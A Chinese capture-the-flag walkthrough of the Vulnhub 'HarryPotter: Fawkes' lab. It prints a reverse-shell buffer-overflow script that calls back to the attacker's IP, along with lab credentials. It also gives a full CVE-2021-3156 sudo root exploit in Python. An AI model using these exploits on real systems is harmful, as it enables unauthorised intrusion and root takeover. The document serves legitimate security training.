zmjjtt
zmjjtt

HARRYPOTTER: FAWKES

攻击机

192.168.223.128

目标机192.168.223.143

主机发现

nmap -sP 192.168.223.0/24

HARRYPOTTER: FAWKES_第1张图片

端口扫描

nmap -sV -p- -A 192.168.223.143

HARRYPOTTER: FAWKES_第2张图片

开启了21 22 80 2222 9898 五个端口,其中21端口可以匿名FTP登录,好像有点说法,百度搜索一下发现可以用anonymous登录,尝试一下

ftp连接方式是ftp IP

ftp 192.168.223.143
用户名anonymous
密码随便输

HARRYPOTTER: FAWKES_第3张图片

可以看到有个server_hogwarts文件

get到本地

get server_hogwarts

看一下是什么文件

vim打开文件头有一个ELF,应该是一个可执行文件,用file看一下,果然是。

运行一下试试,发现没有权限,赋个权

HARRYPOTTER: FAWKES_第4张图片

没反应,一直在后台运行

用ps看一下后台程序

ps用法
ps aux: 显示当前用户的所有进程信息
ps aux | grep <进程名>: 通过进程名过滤查看特定进程的信息

其他查看后台程序还可以用pgrep,top,htop,jobs,pstree



ps aux | grep server_hogwarts

只能看到程序在运行,好像没什么用

ss -pantu | grep server_hogwarts

可以查看当前系统上网络连接的情况

连接了9898端口,这个端口我们在扫描端口时候发现,是monkeycom服务

既然是本地文件执行,我们本地开个监听端口看看这个服务是什么

nc 127.0.0.1 9898

HARRYPOTTER: FAWKES_第5张图片

好像pwn题

随便输入了一下好像不太行

HARRYPOTTER: FAWKES_第6张图片

感觉像缓冲区溢出漏洞

用edb-debugger动调看看吧

首先关闭kali的ALSR

echo 0 >/proc/sys/kernel/randomize_va_space

HARRYPOTTER: FAWKES_第7张图片

edb打开调试界面

HARRYPOTTER: FAWKES_第8张图片

HARRYPOTTER: FAWKES_第9张图片

连接一下

HARRYPOTTER: FAWKES_第10张图片

我不会汇编,看了别人的wp跟着一步步看一步步学

点击这个开始进程

HARRYPOTTER: FAWKES_第11张图片

想找到缓冲区溢出漏洞,需要填充大量数据找到溢出位置

先用python生成500个A

python
print('A'*500)

将500个A填入输入位置,发现了报错HARRYPOTTER: FAWKES_第12张图片

提示0×41414141的内存位置出现了错误,说明这里就是溢出报错位置,点击ok具体查看

HARRYPOTTER: FAWKES_第13张图片

在x86架构的汇编语言中,EIP(Extended Instruction Pointer)是一个32位寄存器,用于存储下一条即将执行的指令的地址。EIP指向当前正在执行的指令的下一条指令,因此它起到了指令流的控制作用。ESP是存储具体指令的作用,但是这里ESP被A覆盖了。

那么就可以通过修改EIP,使指令跳转到目标ESP

但是现在还没有找到缓存区溢出的位置,现在通过传入不相同的垃圾数据找到溢出位置

使用msf-pattern_create生成500个不同字符串

msf-pattern_create -l 500

将垃圾数据填入重新调试

HARRYPOTTER: FAWKES_第14张图片

现在是0×64413764有问题

用msf-pattern_offset找到这个内存位置在输入区的位置

msf-pattern_offset -l 500 -q 64413764

HARRYPOTTER: FAWKES_第15张图片

偏移量是112,那么0x64413764就在第113个位置。

现在还需要找到EIP的写入地址,使得ESP只想EIP,这样就能执行到EIP的指令了。

见如下操作

HARRYPOTTER: FAWKES_第16张图片

选择ESP-EIP 的跳转,并且有读和执行权限的

HARRYPOTTER: FAWKES_第17张图片

HARRYPOTTER: FAWKES_第18张图片

这个jmp esp就是跳转地址

0x08049455,机器码是反写的,所以实际地址是0x55 0x9d 0x04 0x08这个就是跟在112条垃圾数据后满的地址,即ESP 的内容,接下里是要执行的指令。

用msfvenom来生成一串python的十六进制payload来反弹shell

msfvenom -p linux/x86/shell_reverse_tcp LHOST=192.168.223.128 LPORT=4567 -b "\x00" -f python

HARRYPOTTER: FAWKES_第19张图片

抄个python脚本

#!/usr/bin/python2
import sys,socket
buf =  b""
buf += b"\xb8\xd4\xbe\xd2\x98\xd9\xc3\xd9\x74\x24\xf4\x5d\x31"
buf += b"\xc9\xb1\x12\x31\x45\x12\x03\x45\x12\x83\x39\x42\x30"
buf += b"\x6d\xf0\x60\x42\x6d\xa1\xd5\xfe\x18\x47\x53\xe1\x6d"
buf += b"\x21\xae\x62\x1e\xf4\x80\x5c\xec\x86\xa8\xdb\x17\xee"
buf += b"\x86\x09\xcc\x52\xbe\x33\x0c\xbb\x63\xbd\xed\x0b\xfd"
buf += b"\xed\xbc\x38\xb1\x0d\xb6\x5f\x78\x91\x9a\xf7\xed\xbd"
buf += b"\x69\x6f\x9a\xee\xa2\x0d\x33\x78\x5f\x83\x90\xf3\x41"
buf += b"\x93\x1c\xc9\x02"
 
payload='A'*112+'\x55\x9d\x04\x08'+'\x90'*32+buf
try:
    s=socket.socket()
    s.connect(('192.168.223.143',9898))
    s.send((payload))
    s.close()
except:
    print('wrong')
    sys.exit()

执行payload,拿到shell

可以看到一个隐藏txt文件

应该是一个密码HarrYp0tter@Hogwarts123

ssh连接一下Harry看看,发现连不上,想到之前扫描端口的时候还有个2222端口开启了ssh服务

连接一下2222端口,连接成功

HARRYPOTTER: FAWKES_第20张图片

ssh [email protected] -p 2222

HARRYPOTTER: FAWKES_第21张图片

看到主机名字可以认出这是一个docker服务

sudo -l发现执行权限是所有人

直接sudo -s提升到root权限

sudo -s 是在 Linux 系统中使用 sudo 命令来启动一个新的 shell 进程,并将该 shell 进程的用户权限提升为超级用户(root)

sudo -s

HARRYPOTTER: FAWKES_第22张图片

成功拿到第一个flag

看一下note有啥

这句话让我们分析FTP上面的流量

先查一下有什么网卡

ip a

HARRYPOTTER: FAWKES_第23张图片

eth0网卡

流量分析

tcpdump -i eth0 port 21

HARRYPOTTER: FAWKES_第24张图片

在三次握手包发现账号密码 neville/bL!Bsg3k,用ssh连接一下,这里22端口连接成功

ssh [email protected]

HARRYPOTTER: FAWKES_第25张图片

拿到第二个flag

HARRYPOTTER: FAWKES_第26张图片

接下来最终提权,这里用到一个CVE-2021-3156,是一个基于堆的缓冲区溢出漏洞

因为sudo版本是1.8.27

exp

CVE-2021-3156/exploit_nss.py at main · worawit/CVE-2021-3156 (github.com)

靶机的sudo目录是/usr/local/bin/sudo 而exp是/usr/bin/sudo所以修改一下exp

#!/usr/bin/python3
'''
Exploit for CVE-2021-3156 with overwrite struct service_user by sleepya
This exploit requires:
- glibc with tcache
- nscd service is not running
Tested on:
- Ubuntu 18.04
- Ubuntu 20.04
- Debian 10
- CentOS 8
'''
import os
import subprocess
import sys
from ctypes import cdll, c_char_p, POINTER, c_int, c_void_p
 
SUDO_PATH = b"/usr/local/bin/sudo"
 
libc = cdll.LoadLibrary("libc.so.6")
 
# don't use LC_ALL (6). it override other LC_
LC_CATS = [
	b"LC_CTYPE", b"LC_NUMERIC", b"LC_TIME", b"LC_COLLATE", b"LC_MONETARY",
	b"LC_MESSAGES", b"LC_ALL", b"LC_PAPER", b"LC_NAME", b"LC_ADDRESS",
	b"LC_TELEPHONE", b"LC_MEASUREMENT", b"LC_IDENTIFICATION"
]
 
def check_is_vuln():
	# below commands has no log because it is invalid argument for both patched and unpatched version
	# patched version, error because of '-s' argument
	# unpatched version, error because of '-A' argument but no SUDO_ASKPASS environment
	r, w = os.pipe()
	pid = os.fork()
	if not pid:
		# child
		os.dup2(w, 2)
		execve(SUDO_PATH, [ b"sudoedit", b"-s", b"-A", b"/aa", None ], [ None ])
		exit(0)
	# parent
	os.close(w)
	os.waitpid(pid, 0)
	r = os.fdopen(r, 'r')
	err = r.read()
	r.close()
	
	if "sudoedit: no askpass program specified, try setting SUDO_ASKPASS" in err:
		return True
	assert err.startswith('usage: ') or "invalid mode flags " in err, err
	return False
 
def create_libx(name):
	so_path = 'libnss_'+name+'.so.2'
	if os.path.isfile(so_path):
		return  # existed
	
	so_dir = 'libnss_' + name.split('/')[0]
	if not os.path.exists(so_dir):
		os.makedirs(so_dir)
	
	import zlib
	import base64
 
	libx_b64 = 'eNqrd/VxY2JkZIABZgY7BhBPACrkwIAJHBgsGJigbJAydgbcwJARlWYQgFBMUH0boMLodAIazQGl\neWDGQM1jRbOPDY3PhcbnZsAPsjIjDP/zs2ZlRfCzGn7z2KGflJmnX5zBEBASn2UdMZOfFQDLghD3'
	with open(so_path, 'wb') as f:
		f.write(zlib.decompress(base64.b64decode(libx_b64)))
	#os.chmod(so_path, 0o755)
 
def check_nscd_condition():
	if not os.path.exists('/var/run/nscd/socket'):
		return True # no socket. no service
	
	# try connect
	import socket
	sk = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
	try:
		sk.connect('/var/run/nscd/socket')
	except:
		return True
	else:
		sk.close()
 
	with open('/etc/nscd.conf', 'r') as f:
		for line in f:
			line = line.strip()
			if not line.startswith('enable-cache'):
				continue # comment
			service, enable = line.split()[1:]
			# in fact, if only passwd is enabled, exploit with this method is still possible (need test)
			# I think no one enable passwd but disable group
			if service == 'passwd' and enable == 'yes':
				return False
			# group MUST be disabled to exploit sudo with nss_load_library() trick
			if service == 'group' and enable == 'yes':
				return False
			
	return True
 
def get_libc_version():
	output = subprocess.check_output(['ldd', '--version'], universal_newlines=True)
	for line in output.split('\n'):
		if line.startswith('ldd '):
			ver_txt = line.rsplit(' ', 1)[1]
			return list(map(int, ver_txt.split('.')))
	return None
 
def check_libc_version():
	version = get_libc_version()
	assert version, "Cannot detect libc version"
	# this exploit only works which glibc tcache (added in 2.26)
	return version[0] >= 2 and version[1] >= 26
 
def check_libc_tcache():
	libc.malloc.argtypes = (c_int,)
	libc.malloc.restype = c_void_p
	libc.free.argtypes = (c_void_p,)
	# small bin or tcache
	size1, size2 = 0xd0, 0xc0
	mems = [0]*32
	# consume all size2 chunks
	for i in range(len(mems)):
		mems[i] = libc.malloc(size2)
		
	mem1 = libc.malloc(size1)
	libc.free(mem1)
	mem2 = libc.malloc(size2)
	libc.free(mem2)
	for addr in mems:
		libc.free(addr)
	return mem1 != mem2
 
def get_service_user_idx():
	'''Parse /etc/nsswitch.conf to find a group entry index
	'''
	idx = 0
	found = False
	with open('/etc/nsswitch.conf', 'r') as f:
		for line in f:
			if line.startswith('#'):
				continue # comment
			line = line.strip()
			if not line:
				continue # empty line
			words = line.split()
			if words[0] == 'group:':
				found = True
				break
			for word in words[1:]:
				if word[0] != '[':
					idx += 1
			
	assert found, '"group" database is not found. might be exploitable but no test'
	return idx
 
def get_extra_chunk_count(target_chunk_size):
	# service_user are allocated by calling getpwuid()
	# so we don't care allocation of chunk size 0x40 after getpwuid()
	# there are many string that size can be varied
	# here is the most common
	chunk_cnt = 0
	
	# get_user_info() -> get_user_groups() ->
	gids = os.getgroups()
	malloc_size = len("groups=") + len(gids) * 11
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0  # minimum size is 0x20. don't care here
	if chunk_size == target_chunk_size: chunk_cnt += 1
	
	# host=  (unlikely)
	# get_user_info() -> sudo_gethostname()
	import socket
	malloc_size = len("host=") + len(socket.gethostname()) + 1
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
	if chunk_size == target_chunk_size: chunk_cnt += 1
	
	# simply parse "networks=" from "ip addr" command output
	# another workaround is bruteforcing with number of 0x70
	# policy_open() -> format_plugin_settings() ->
	# a value is created from "parse_args() -> get_net_ifs()" with very large buffer
	try:
		import ipaddress
	except:
		return chunk_cnt
	cnt = 0
	malloc_size = 0
	proc = subprocess.Popen(['ip', 'addr'], stdout=subprocess.PIPE, bufsize=1, universal_newlines=True)
	for line in proc.stdout:
		line = line.strip()
		if not line.startswith('inet'):
			continue
		if cnt < 2: # skip first 2 address (lo interface)
			cnt += 1
			continue;
		addr = line.split(' ', 2)[1]
		mask = str(ipaddress.ip_network(addr if sys.version_info >= (3,0,0) else addr.decode("UTF-8"), False).netmask)
		malloc_size += addr.index('/') + 1 + len(mask)
		cnt += 1
	malloc_size += len("network_addrs=") + cnt - 3 + 1
	chunk_size = (malloc_size + 8 + 15) & 0xfffffff0
	if chunk_size == target_chunk_size: chunk_cnt += 1
	proc.wait()
	
	return chunk_cnt
 
def execve(filename, argv, envp):
	libc.execve.argtypes = c_char_p,POINTER(c_char_p),POINTER(c_char_p)
	
	cargv = (c_char_p * len(argv))(*argv)
	cenvp = (c_char_p * len(envp))(*envp)
 
	libc.execve(filename, cargv, cenvp)
 
def lc_env(cat_id, chunk_len):
	name = b"C.UTF-8@"
	name = name.ljust(chunk_len - 0x18, b'Z')
	return LC_CATS[cat_id]+b"="+name
 
 
assert check_is_vuln(), "target is patched"
assert check_libc_version(), "glibc is too old. The exploit is relied on glibc tcache feature. Need version >= 2.26"
assert check_libc_tcache(), "glibc tcache is not found"
assert check_nscd_condition(), "nscd service is running, exploit is impossible with this method"
service_user_idx = get_service_user_idx()
assert service_user_idx < 9, '"group" db in nsswitch.conf is too far, idx: %d' % service_user_idx
create_libx("X/X1234")
 
# Note: actions[5] can be any value. library and known MUST be NULL
FAKE_USER_SERVICE_PART = [ b"\\" ] * 0x18 + [ b"X/X1234\\" ]
 
TARGET_OFFSET_START = 0x780
FAKE_USER_SERVICE = FAKE_USER_SERVICE_PART*30
FAKE_USER_SERVICE[-1] = FAKE_USER_SERVICE[-1][:-1]  # remove last '\\'. stop overwritten
 
CHUNK_CMND_SIZE = 0xf0
 
# Allow custom extra_chunk_cnt incase unexpected allocation
# Note: this step should be no need when CHUNK_CMND_SIZE is 0xf0
extra_chunk_cnt = get_extra_chunk_count(CHUNK_CMND_SIZE) if len(sys.argv) < 2 else int(sys.argv[1])
 
argv = [ b"sudoedit", b"-A", b"-s", b"A"*(CHUNK_CMND_SIZE-0x10)+b"\\", None ]
env = [ b"Z"*(TARGET_OFFSET_START + 0xf - 8 - 1) + b"\\" ] + FAKE_USER_SERVICE
# first 2 chunks are fixed. chunk40 (target service_user) is overwritten from overflown cmnd (in get_cmnd)
env.extend([ lc_env(0, 0x40)+b";A=", lc_env(1, CHUNK_CMND_SIZE) ])
 
# add free chunks that created before target service_user
for i in range(2, service_user_idx+2):
	# skip LC_ALL (6)
	env.append(lc_env(i if i < 6 else i+1, 0x40))
if service_user_idx == 0:
	env.append(lc_env(2, 0x20)) # for filling hole
 
for i in range(11, 11-extra_chunk_cnt, -1):
	env.append(lc_env(i, CHUNK_CMND_SIZE))
 
env.append(lc_env(12, 0x90)) # for filling holes from freed file buffer
env.append(b"TZ=:")  # shortcut tzset function
# don't put "SUDO_ASKPASS" environment. sudo will fail without logging if no segfault
env.append(None)
 
execve(SUDO_PATH, argv, env)

用scp传到靶机

scp exp.py [email protected]:~

HARRYPOTTER: FAWKES_第27张图片

执行拿到root权限,进而拿到第三个flag

chmod +x exp.py
./exp.py

HARRYPOTTER: FAWKES_第28张图片

总结:

1.ftp匿名登录拿到ELF文件

2.本地edb动调,缓冲区溢出漏洞,计算偏移量,找ESP跳转地址,msfvenom生成反弹shell字节,编写py脚本拿到shell

3.2222端口连接,sudo -s提升root权限

4.FTP流量分析,拿到账号密码连接ssh

5.sudo CVE-2021-3156提权

你可能感兴趣的:(vulnhub靶场,网络空间安全,vulnhub靶场,内网渗透)

  • python docker 镜像过大_【转】六种减小Docker镜像大小的方法 weixin_39627408 pythondocker镜像过大
    转自P牛,vulnhub作者,擅长代码审计和漏洞挖掘,今天看到他的公众号发了一篇这个,正好平时自己的工作也有需求,整理记录如下。=========================================我从2017年做Vulhub开始,一直在和一个麻烦的问题做斗争:在编写Dockerfile的时候,如何减小dockerbuild生成的镜像大小?这篇文章就给大家总结一下我自己使用过的六种减小
  • 2024三掌柜赠书活动第十四期:网络靶场与攻防演练 三掌柜666 php网络web安全
    目录前言网络靶场的概念和作用攻防演练的重要性和实施方法1、攻防演练的重要性2、攻防演练的实施方法关于《网络靶场与攻防演练》编辑推荐内容简介作者简介图书目录书中前言/序言《网络靶场与攻防演练》全书速览结束语前言在当今数字化时代,随着互联网的快速发展和应用程序的广泛使用,网络安全成为了各个组织和企业不可忽视的重要领域,成为了不可或缺的一部分。为了保护网络免受各种威胁和攻击,网络靶场和攻防演练成为了一种
  • docker搭建现成的靶场 晓幂 docker容器运维
    Docker安装:apt-getinstalldocker.ioUpload-labs——文件上传靶场搭建:因为Dockerhub上存在镜像源,所以,索性直接拉取过来,dockerpullc0ny1/upload-labs等到下载完成之后,就可以创建容器:dockerrun-d-p81:80c0ny1/upload-labs-p:意为端口映射,格式为宿主机端口:容器端口。由于我的Linux的80端
  • BossPlayerCTF Y4y17 Vulnhub安全web安全网络网络安全学习
    靶场环境问题靶场下载之后,可能会出现扫描不到IP的情况,需要进行调整,参考:Vulnhub靶机检测不到IP地址_vulnhub靶机nmap扫不到-CSDN博客该靶机没有vim,需要使用vi命令去修改;改成当前网卡即可!信息收集#nmap-sn192.168.1.0/24-oNlive.nmapStartingNmap7.94(https://nmap.org)at2024-02-0409:31CS
  • 命令执行讲解和函数 Ryongao 网络安全命令执行
    命令执行漏洞简介命令执行漏洞产生原因应用未对用户输入做严格得检查过滤,导致用户输入得参数被当成命令来执行命令执行漏洞的危害1.继承Web服务程序的权限去执行系统命会或读写文件2.反弹shell,获得目标服务器的权限3.进一步内网渗透远程代码执行因为业务需求,在PHP中有时需要调用一些执行命令的函数·如:eval0、assert0、preg_replace0、create_function0等,如果
  • 【BUUCTF 加固题】Ezsql 速通 hacker-routing webCTF夺旗赛开发语言前端javascriptweb安全htmlphpCTF
    博主介绍‍博主介绍:大家好,我是hacker-routing,很高兴认识大家~✨主攻领域:【渗透领域】【应急响应】【Java】【VulnHub靶场复现】【面试分析】点赞➕评论➕收藏==养成习惯(一键三连)欢迎关注一起学习一起讨论⭐️一起进步文末有彩蛋作者水平有限,欢迎各位大佬指点,相互学习进步!目录前言一、访问web网址二、ssh远程登录三、加固网站源代码前言靶机地址解释:第一行:目标机器WEB服
  • DVWA 靶场之 Brute Force-Low&Medium(前期配置铺垫与渗透方法及源码分析) Myon⁶ DVWA靶场web暴力破解burpsuiteweb代理模式web安全
    首先登录DVWA靶场DVWA默认的用户有5个,用户名及密码如下:admin/passwordgordonb/abc1231337/charleypablo/letmeinsmithy/password难度等级设置为low,我们先从最简单的开始来到BruteForce(暴力破解)我们可以输入用户名和密码简单测了几个,回显用户名或密码不正确但是并未对我们输入的内容及次数进行限制,因此直接进行爆破暴力破
  • 防御保护--信息安全概述 码上方舟 网络安全网络安全
    防御保护--信息安全概述一、网络安全的背景1.1网络安全的定义网络安全又叫网络空间安全(Cyberspace),2003年美国提出网络空间的概念,即一个由信息基础设施(包括计算机、交换机、服务器等物质实体)组成的互相依赖的网络。我国官方文件的定义,即网络空间为继海(海洋)、陆(陆地)、空(天空)、天(太空)以外的第五大人类活动领域。1.2信息安全和网络安全(1)信息安全就是数据安全,即防止任何对数
  • 【靶机渗透】HACKME: 1 安全狐 靶机渗透安全
    【靶机渗透】HACKME:1本篇将分享一个来源于VulnHub社区,适合初学者的靶机HACKME:10x01靶机介绍1.详情链接https://www.vulnhub.com/entry/hackme-1,330/发布日期2019年7月18日作者x4bx54难度初学者,简单2.描述'hackme'isabeginnerdifficultylevelbox.Thegoalistogainlimite
  • w25 web漏洞之xss 杭城我最帅 前端xss
    pikachu靶场第一关-反射型xss(get)利用hpp漏洞破解第二关-反射型xss(post)登录:admin/123456修改postdata内的参数第三关-存储型xss在留言板输入message=alert(1)第四关-DOM型xsswhatdoyousee?是把输入框内的内容拼接url。常见XSS语句标签,xssxss第五关-DOM型xss跟第四关一样dvwa靶场第一关-xss(Refl
  • threehit漏洞复现以及防御 凌晨五点的星 网络安全安全web安全
    说白了跟sql-liql靶场二次注入一样,也是一个转义函数而这次是,入库的时候不转义,出库的时候会转义导致这个漏洞出现开始测试:这是我注册完test刚登录的情况找注入点更新数据的update,很容易找到在age段这次我注册的时候用户还是test,但是年龄我对后面进行了省略可以看到我直接登录到管理员上了防御:可以进行强转这样无法闭合漏洞也就无法实现了
  • 面试经验分享 | 通关某公司面试靶场 zkzq 面试经验分享职场和发展
    本文由掌控安全学院-冰封小天堂投稿0x00:探测IP首先打开时候长这个样,一开始感觉是迷惑行为,试了试/admin,/login这些发现都没有随后F12查看网络,看到几个js文件带有传参,就丢sqlmap跑了一下无果随后也反查了域名一下,发现没有域名,是阿里云的,这里突然醒悟,我第一步是信息收集。kalilinux启动,nmap启动,直接常规扫描一波,发现开启了这么多,ftp和ssh可以爆破,但因
  • (二)【Jmeter】专栏实战项目靶场drupal部署 WEL测试 JMeter接口测试实战指南jmeter自动化测试工具
    该专栏后续实战示例,都以该篇部署的项目展开操作。前置条件参考“(一)【Jmeter】JDK及Jmeter的安装部署及简单配置”安装部署Jmeter,从文章最后下载“Postman、Rancher.ova、VirtualBox-7.0.12-159484-Win.exe、Xshell-7.0.0144p.exe、Xftp-7.0.0144p.exe”VirtualBox安装首先,双击“Virtual
  • (五)【Jmeter】使用代理录制HTTP脚本操作步骤及注意事项 WEL测试 JMeter接口测试实战指南jmeter接口测试HTTP请求
    前置信息软件版本Jmeter5.6.3服务网址备注drupalhttp://192.168.88.88:18080/(二)【Jmeter】专栏实战项目靶场drupal部署用户名密码test1test1test2test2实操记录1、启动jmeter,操作顺序见下图2、在视图面板添加如下信息,点击开始
  • SQL-Labs靶场“6-10”关通关教程 君衍.⠀ SQL-Labs渗透测试网络安全sql数据库负载均衡运维linux网络安全渗透测试
    君衍.一、第六关基于GET的双引号报错注入1、源码分析2、floor报错注入3、updatexml报错注入二、第七关基于文件写入注入1、源码分析2、outfile注入过程三、第八关基于GET单引号布尔盲注1、源码分析2、布尔盲注(脚本)2、布尔盲注(手工)3、布尔盲注(sqlmap)四、第九关基于GET单引号时间盲注1、源码分析2、时间盲注(手工)3、时间盲注(脚本)4、时间盲注(sqlmap)五
  • SQL-Labs靶场“15-20”关通关教程 君衍.⠀ SQL-Labs网络安全渗透测试sql数据库pythonjavalinux网络安全渗透测试
    君衍.一、十六关基于POST双引号布尔型时间盲注1、源码分析2、布尔盲注(手动)2、布尔盲注(脚本)3、时间盲注(sqlmap)二、十七关基于POST错误的更新1、源码分析2、报错注入三、十八关基于POST的Uagent字段注入1、源码分析2、floor报错注入3、updatexml报错注入四、十九关基于POST的Referer字段注入1、源码分析2、floor报错注入3、updatexml报错注
  • SQL-Labs靶场“1-5”关通关教程 君衍.⠀ SQL-Labs渗透测试网络安全sql数据库docker容器运维web安全php
    君衍.一、准备工作二、第一关基于GET单引号字符型注入1、源码分析2、联合查询注入过程三、第二关基于GET整型注入1、源码分析2、联合查询注入过程四、第三关基于GET单引号变形注入1、源码分析2、联合查询注入过程五、第四关基于GET双引号字符型注入1、源码分析2、联合查询注入过程六、第五关基于GET单引号报错注入1、源码分析2、floor报错注入3、updatexml报错注入点击跳转:SQL-La
  • SQL-Labs靶场“11-15”关通关教程 君衍.⠀ SQL-Labs渗透测试网络安全sql数据库pythonjavalinux网络安全渗透测试
    君衍.一、十一关基于POST单引号字符型注入1、源码分析2、联合查询注入3、报错注入二、十二关基于POST双引号字符型注入1、源码分析2、联合查询注入3、报错注入三、十三关基于POST单引号报错注入变形1、源码分析2、报错注入四、十四关基于POST双引号报错注入1、源码分析2、报错注入五、十五关基于POST单引号布尔型时间盲注1、源码分析2、布尔盲注(手动)2、布尔盲注(脚本)3、时间盲注(sql
  • 国内外黑客居然都在这些地方聚集 MR_sasa 黑客安全信息安全其他数据挖掘
    1.track黑客导航导航Track黑客导航黑客导航,含有众多网安一行的官方网站及平台无论你是老鸟还是萌新,都可以找得到对应适合的文章!2.封神台靶场封神台-掌控安全在线演练靶场,是一个在线黑客攻防演练平台。在线练习靶场,是一个在线黑客攻防演练平台!在成长的道路上怎么能缺少打怪刷级的乐趣呢!但是市面上的网站漏洞组成复杂,而且会有法律风险,想要技术,封神台靶场是一个好的选择3.黑客社区Track安全
  • 干货 | 绕过WAF的常见Web漏洞利用分析 网络安全大白 程序员网络安全黑客前端网络安全安全系统安全
    前言本文以最新版安全狗为例,总结一下我个人掌握的一些绕过WAF进行常见WEB漏洞利用的方法,希望能起到抛砖引玉的效果。如果师傅们有更好的方法,烦请不吝赐教。PS:本文仅用于技术研究与讨论,严禁用于任何非法用途,违者后果自负,作者与平台不承担任何责任测试环境PHPStudy(PHP5.4.45+Apache+MySQL5.5.53)+最新版安全狗(4.0.28330)靶场使用DVWA:http://
  • 文件上传漏洞--Upload-labs--Pass09(在某些版本的靶场里是Pass10)--点+空格+点 绕过 给我杯冰美式 Web安全--文件上传漏洞文件上传漏洞web安全
    一、什么是点+空格+点绕过顾名思义,将test.php改为test.php..,观察到后缀名php后多出了点+空格+点。那么点+空格+点是如何进行绕过的,在什么情况下可以使用,让我们结合题目讲解。二、代码审计1、查看题目源代码上半部分,题目采取黑名单,并且对Pass05-Pass07的题目中所出现的漏洞进行了有效修复,意味着我们不再能够使用点绕过/空格绕过/大小写绕过了。2、接着查看源代码下半部分
  • 【web | CTF】BUUCTF [网鼎杯 2020 青龙组]AreUSerialz 星盾网安 CTFphp
    天命:php的序列化题目简直是玄学,既不能本地复现,也不能求证靶场环境天命:本地php是复现不了反序列化漏洞的,都不知道是版本问题还是其他问题天命:这题也是有点奇怪的,明明用字符串2也应该是可以,但偏偏就不行,神奇了进来题目先看到php代码审计,是反序列化漏洞先看进来入口的逻辑,判断是不是正常的ascii码字符,然后反序列化,可以忽略校验,都是正常的//校验你是不是ascii码里面的合法字符fun
  • CFS三层靶机 0e1G7 渗透笔记服务器linux运维
    参考博客:CFS三层内网靶场渗透记录【详细指南】-FreeBuf网络安全行业门户CFS三层靶机搭建及其内网渗透【附靶场环境】|TeamsSixCFS三层网络环境靶场实战-PANDA墨森-博客园(cnblogs.com)CFS三层靶机实战--内网横向渗透-知乎(zhihu.com)CFS靶机实战演练-从外网杀进三层内网,横向渗透拿到Flag-阿里云开发者社区(aliyun.com)主机发现fscan
  • vulnhub-Momentum2 南冥~ sshphplinux
    vulnhub-Momentum2靶机首先先去下载靶机地址:https://download.vulnhub.com/momentum/Momentum2.ova下载完靶机,直接利用VMave导入打开一,信息收集首先确定自己的靶机为net模式,知道自己靶机所在网段然后利用kali进行IP扫描:nmap-sP192.168.229.0/24发现存活的IP,除去自己的IP发现靶机IP:192.168.
  • [Vulnhub]Momentum2 Snakin_ya 渗透测试实战linuxssh安全
    信息搜集1.netdiscover扫了半天扫不到,后来dl告诉说虚拟机配置有问题,参考https://blog.csdn.net/qq_45290991/article/details/114189156然后顺利扫到ip2.masscanmasscan--rate=10000--ports0-65535192.168.131.1333.nmapnmap-A192.168.131.133网站测试尝试
  • upload-labs文件上传漏洞靶场 Ryongao 网络安全
    第一关发现他这个是通过客户端前端写了一个限制我们禁用srcipt即可蚁剑成功打开第二关我们上传文件2.php它提示我们文件类型不正确我们可以联想到做了后缀检测我们通过burp抓包修改后缀第三关我们上传一个.php文件不可上传尝试后缀大小写绕过、空格绕过、点绕过、:ATA绕过等操作都不行查看源代码发现全部禁止了在某些特定环境中某些特殊后缀仍会被当作php文件解析php、php2、php3、php4、
  • DC-4靶场实战详解 a310034188 DC安全linuxweb安全
    DC-4靶场实战详解环境安装DC-4下载地址:https://www.vulnhub.com/entry/dc-4,313/kali与DC-4网络配置设为一致,我这里都是用nat模式寻找FLAG信息收集1.寻找靶机ip我的kaliip为192.168.79.128不知道kaliip的可以直接ipadd查看在kali中使用nmap或者使用arp-scan方法一:arp-scan-l方法二:nmap-
  • Vulnhub靶机:DC4 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC4(10.0.2.57)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-4,313/二、信息收集使用nmap主机发现靶机ip:10.0.2.57使用nmap端口扫描发现靶机开放端口:22、80打开网站是一个登录页面,查看源码也没有发现隐藏信息使用
  • 信息安全中常用术语介绍 L.Lawliet 信息安全信息安全安全漏洞
    信息安全中常用术语介绍目录信息安全中常用术语介绍什么是VUL什么是0day漏洞和0day攻击什么是CVE什么是CWE什么是PoC什么是Exp什么是漏洞靶场什么是CVSS什么是OVAL什么是CCE什么是CPE什么是XCCDF什么是SCAP参考文档本文在原文基础上又进行了些许资料搜集整理,希望对大家有所帮助。在一些重大的安全事件发生后,经常会在相关新闻或文档中看到一些相关的安全术语,比如:VUL、CV
  • Vulnhub靶机:DC3 huang0c 靶场web安全
    一、介绍运行环境:Virtualbox攻击机:kali(10.0.2.15)靶机:DC3(10.0.2.56)目标:获取靶机root权限和flag靶机下载地址:https://www.vulnhub.com/entry/dc-32,312/二、信息收集使用nmap主机发现靶机ip:10.0.2.56使用nmap端口扫描发现靶机开放端口:80打开网站发现是一个登录界面,查看源码未发现隐藏信息使用go
  • 多线程编程之理财 周凡杨 java多线程生产者消费者理财
          现实生活中,我们一边工作,一边消费,正常情况下会把多余的钱存起来,比如存到余额宝,还可以多挣点钱,现在就有这个情况:我每月可以发工资20000万元 (暂定每月的1号),每月消费5000(租房+生活费)元(暂定每月的1号),其中租金是大头占90%,交房租的方式可以选择(一月一交,两月一交、三月一交),理财:1万元存余额宝一天可以赚1元钱,
  • [Zookeeper学习笔记之三]Zookeeper会话超时机制 bit1129 zookeeper
    首先,会话超时是由Zookeeper服务端通知客户端会话已经超时,客户端不能自行决定会话已经超时,不过客户端可以通过调用Zookeeper.close()主动的发起会话结束请求,如下的代码输出内容 Created /zoo-739160015 CONNECTEDCONNECTED .............CONNECTEDCONNECTED CONNECTEDCLOSEDCLOSED
  • SecureCRT快捷键 daizj secureCRT快捷键
    ctrl + a : 移动光标到行首ctrl + e :移动光标到行尾crtl + b: 光标前移1个字符crtl + f: 光标后移1个字符crtl + h : 删除光标之前的一个字符ctrl + d :删除光标之后的一个字符crtl + k :删除光标到行尾所有字符crtl + u : 删除光标至行首所有字符crtl + w:  删除光标至行首
  • Java 子类与父类这间的转换 周凡杨 java 父类与子类的转换
        最近同事调的一个服务报错,查看后是日期之间转换出的问题。代码里是把 java.sql.Date 类型的对象 强制转换为 java.sql.Timestamp 类型的对象。报java.lang.ClassCastException。       代码:            
